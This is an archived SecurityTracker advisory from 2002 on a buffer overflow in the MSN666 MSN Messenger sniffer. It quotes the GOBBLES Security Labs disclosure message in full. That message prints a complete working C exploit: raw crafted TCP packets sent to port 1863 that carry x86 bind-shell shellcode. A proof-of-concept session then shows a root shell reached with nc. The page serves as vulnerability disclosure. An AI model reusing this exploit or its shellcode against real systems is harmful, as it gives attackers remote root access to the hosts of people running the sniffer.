SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   MSN666 Vendors:   Seo, Seunghyun
(Exploit Code is Available) Re: MSN666 Sniffer For MSN Messenger Traffic Has Buffer Overflow That Lets Remote Users Execute Arbitrary Code on the Sniffer to Gain Root Access
SecurityTracker Alert ID:  1004577
SecurityTracker URL:  http://securitytracker.com/id/1004577
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 19 2002
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  

Description:   GOBBLES Security Labs reported a buffer overflow vulnerability in the MSN666 network sniffer for capturing MSN Messenger traffic. A remote user can execute arbitrary code on the sniffer with root level privileges

The buffer overflow reportedly resides in the pattern2() module in the 'msn666.c' file. A sscanf() call is made that writes a string to a 16 character variable without checking the size of the string. The string is apparently based on the sniffed IP packet and may be longer than 16 characters. This section of code is reportedly triggered when a sniffed packet's TCP PSH flag is set.

A remote user can send a specially crafted TCP packet with the PSH flag set and destined for an arbitrary host on the MSN Messenger port (1863) to trigger the buffer overflow and overwrite the EIP address on the host running the MSN666 sniffer. This allows the remote user to execute arbitrary code on the vulnerable host.

A demonstration exploit is provided in the Source Message.

Impact:   A remote user can cause arbitrary code to be executed by the sniffer. Because the sniffer runs with root level privileges, the remote user can then gain root access on the system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  underground.or.kr/project/msn666/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Jun 14 2002 MSN666 Sniffer For MSN Messenger Traffic Has Buffer Overflow That Lets Remote Users Execute Arbitrary Code on the Sniffer to Gain Root Access



 Source Message Contents

Subject:  UPDATE UPDATE UPDATE UPDATE UPDATE UPDATE



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ++++++++ALERT++++++++ALERT++++++++ALERT++++++++ALERT++++++++
++++STILL BACKDOOR IN MSN666 MSN SNIFFER FOR SNIFFING MSN+++++
 ++++++++ALERT++++++++ALERT++++++++ALERT++++++++ALERT++++++++


+EMERGENCY+++

After disclosing malicicious backdoor root hole in msn666 sniffer
for sniffing msn yesterday, GOBBLES notice following in he inbox:

...

<QUOTE>

What about the version posted today?

http://underground.or.kr/project/msn666/msn666-1.0.1.tar.gz

Thanks!

- ---
Dustin Miller, President
SharePoint Experts, a division of FuseWerx LTD
http://www.sharepointexperts.com/
http://www.fusewerx.com/

</QUOTE>


Thank you Mr. President! GOBBLES get right on it hehehe ;PPppPP

Then we also see this:

Return-Path: <cyrus@imap3.hushmail.com>
X-Sieve: cmu-sieve 2.0
Return-Path: <s1980914@inhavision.inha.ac.kr>
Received: from smtp4.hushmail.com (smtp4.hushmail.com [64.40.111.34])
        by imap3.hushmail.com (Postfix) with ESMTP id E780E28184E
        for <gobbles_40hushmail_2ecom@imap3.hushmail.com>; Fri, 14 Jun 2002 08:08:17 -0700 (PDT)
Received: from inhavision.inha.ac.kr (inhavision.inha.ac.kr [165.246.10.162])
        by smtp4.hushmail.com (Postfix) with ESMTP
        id B7A2B3F11; Fri, 14 Jun 2002 08:08:04 -0700 (PDT)
Received: from SEONUS (inhavision.inha.ac.kr [165.246.10.162])
        by inhavision.inha.ac.kr (8.11.1/8.11.1) with SMTP id g5EFFJ509086;
        Sat, 15 Jun 2002 00:15:22 +0900 (KST)
Message-ID: <001801c213b4$b3563e90$6401a8c0@SEONUS>
From: "Seunghyun Seo" <s1980914@inhavision.inha.ac.kr>
To: <gobbles@hushmail.com>, <camis@mweb.co.za>
Cc: <bugtraq@securityfocus.com>, <vuln-dev@securityfocus.com>,
        <bugs@securitytracker.com>, <vulnwatch@vulnwatch.org>,
        <submissions@packetstormsecurity.org>, <GOBBLES@hushmail.com>
References: <200206132342.g5DNgvc54973@mailserver4.hushmail.com>
Subject: Re: +ALERT+ BACKDOOR IN MSN666 SNIFFER FOR SNIFFING MSN +ALERT+
Date: Sat, 15 Jun 2002 00:03:46 +0900
Organization: khdp.org, underground.or.kr
MIME-Version: 1.0
Content-Type: text/plain;
        charset="euc-kr"
Content-Transfer-Encoding: base64
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2462.0000


I'm writer of msn666 msn messege sniffer,
there are no problems, and no backdoors in it,
if you read the code and procdulre of it detail then you could notice it rightly.

Check msn666-1.0.0.tar.gz  and msn666-1.0.1.tar.gz
at http://underground.or.kr/project/msn666/  again.
previous my attaching file needs revision.

...

And still see bugs? in code... HRM!?!?!


+ALERT+++

Backdoor still present in updated version of msn666 sniffer for
sniffing msn.

+DETAILS+++

GOBBLES-scan-incoming detect following in incoming backdoor packag-
e of updated msn666 sniffer for sniffing msn version 1.0.1:

msn666.c:

...

void
pattern2 ( char *msg, int size )
{
        char opmsg[16];

...

        sscanf ( msg, "%s", &opmsg );

...

It still called like this from runpkt():

...

        if ( (int)htons(tcp->dest) == 1863 || ok_flg ) {

...

        if ( tcp->psh ) {
                memcpy ( buf, data, sizeof(buf) );
                pattern2( buf, htons(ip->tot_len)-40 );
...

GOBBLES think it quite obvious this is still malicicous root backdoor
in msn666 sniffer for sniffing msn.

+EXPLOIT CODE+++

Now that GOBBLES save he friends of team bugtraq from malicious backdoor
root hole in msn666 sniffer for sniffing msn version 1.0.0 and msn666
sniffer for sniffing msn version 1.0.1 it is time to release he exploit
code:

/*
 * disclaimer:
 *
 * GOBBLES SECURITY LABS (GSL) members working
 * on version with -m capabilities. Utilizing libnet.
 *
 * GOBBLES <3 ROUTE
 *
 * This version proves point that even two year
 * old can write remote exploit. Somehow, this
 * horribly written code by Alicia's 2 year old
 * adopted korean nephew works. Remember if you
 * flame this code, you're mocking a 2 year old
 * with more skill than you.
 *
 * There is nothing special about having the ability
 * to write remote root xploits.
 *
 */
/*
 * GOBBLES-own-msn666.c (Quack Sang edition)
 *
 */

// #include <libnet.h>

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>

#define DADA 0x90

char nappytime[256], treattreat[] =
        // GOBBLES use Taeho shellcode because he speak turkey, hehehe
        // Hello friend Taeho Oh! Come pick up shirt at Defcon@!@!
        "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
        "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
        "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
        "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
        "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
        "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
        "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
        "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
        "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
        "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
        "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";


int
main(int argc, char **argv)
{
        struct sockaddr_in playtime;
        struct hostent *poopoo;
        struct iphdr *peepee;
        struct tcphdr *noodlemmm;
        int phewwy, banana, yes = 1;
        char *diaper, *googoo, *store;

        if(argc != 4) {
                fprintf(stdout, "%s <shellcode_address> <source_ip> <dest_host>\n", argv[0]);
                exit(1);
        }

        sscanf(argv[1], "%p", &store);

        banana = (sizeof(struct iphdr) + sizeof(struct tcphdr) + strlen(treattreat) + sizeof(nappytime) + 24 + 1);
        diaper = malloc(banana);
        googoo = (char *) (diaper + sizeof(struct iphdr) + sizeof(struct tcphdr));

        peepee = (struct iphdr *) diaper;
        noodlemmm = (struct tcphdr *) (diaper + sizeof(struct iphdr));

        memset(diaper, '\0', banana);
        memset(googoo, 'x', 16);
        *(long *)&googoo[16] = (long)store;
        *(long *)&googoo[20] = (long)store;
        memset(nappytime, DADA, sizeof(nappytime));
        memcpy(googoo+24, nappytime, strlen(nappytime));
        memcpy(googoo+24+strlen(nappytime), treattreat, strlen(treattreat));

        if((poopoo = gethostbyname(argv[3])) == NULL) {
                perror(";PPppPPpPp");
                exit(1);
        }

        if((phewwy = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
                perror(";PPpPPpPP");
                exit(1);
        }

        if (setsockopt(phewwy, IPPROTO_IP, IP_HDRINCL, (char *)&yes, sizeof(yes)) == -1) {
                perror(";PPppPPPp");
                exit(1);
        }

        /* hihihihihi */
        peepee->version = 4;
        peepee->ihl = 5;
        peepee->tot_len = htons(banana);
        peepee->id = htons(getpid());
        peepee->frag_off = 0;
        peepee->ttl = 255;
        peepee->protocol = IPPROTO_TCP;
        peepee->check = 0;
        peepee->saddr = inet_addr(argv[2]);
        /* giggle */
        peepee->daddr = inet_addr(inet_ntoa(*((struct in_addr *)poopoo->h_addr)));
        /* dewty diapey?!? */
        noodlemmm->source = htons(9999);
        noodlemmm->dest = htons(1863);
        noodlemmm->seq = random();
        noodlemmm->doff = 5;
        noodlemmm->syn = 0;
        noodlemmm->window = htons(8888);
        noodlemmm->psh = 1;

        playtime.sin_family = AF_INET;
        playtime.sin_port = noodlemmm->dest;
        playtime.sin_addr = *((struct in_addr *)poopoo->h_addr);
        memset(&(playtime.sin_zero), '\0', 8);


        if((sendto(phewwy, diaper, banana, 0, (struct sockaddr *)&playtime, sizeof(struct sockaddr))) == -1) {
                perror(";PPpPPPppPP");
                exit(1);
        }
        else {
                fprintf(stdout, "!@# GOBBLES-own-msn666 (Quack Sang edition) packet sent !@#\n");
                exit(0);
        }
}



+PROOF OF CONCEPT+++

GOBBLES run msn666 sniffer for sniffing msn version 1.0.1 on he Local
Area Network (LAN) once again to prove point:

# ./msn666


Then GOBBLES run he Quack Sang version of GOBBLES-own-msn666.c:

# ./GOBBLES-own-msn666 0xbfffd6d0 192.168.0.1 192.168.0.2
!@# GOBBLES-own-msn666 (Quack Sang edition) packet sent !@#
# nc 192.168.0.2 30464
id
uid=0(root) gid=0(root) groups=0(root)



+GREETZ+++
Dave Ahmed for sorting our the mess for us.  Look for us at
defcon, we've got a special tshirt just for you!

All our friends who have already emailed us with their thanks
for saving them from this sneaky backdoor.  Hopefully, now that
the Quack Sang exploit is now private, it'll encourage people
to stop running the software and to those naughty people who
think sniffing is an ethical action (mailsnarf anyone?), will
get what they deserve.

GOBBLES Security
http://www.bugtraq.org
http://www.immunitysec.com/GOBBLES/ <- first official mirror,
                                       thanks so much Dave!

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlwEARECABwFAj0KB9kVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPYe4A
n3X6YEh7eOA6uv5c2zQ6OTX8qybDAJ9mw17ofjDqRcgwVp7lMRz7+YlDKg==
=rD4m
-----END PGP SIGNATURE-----

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC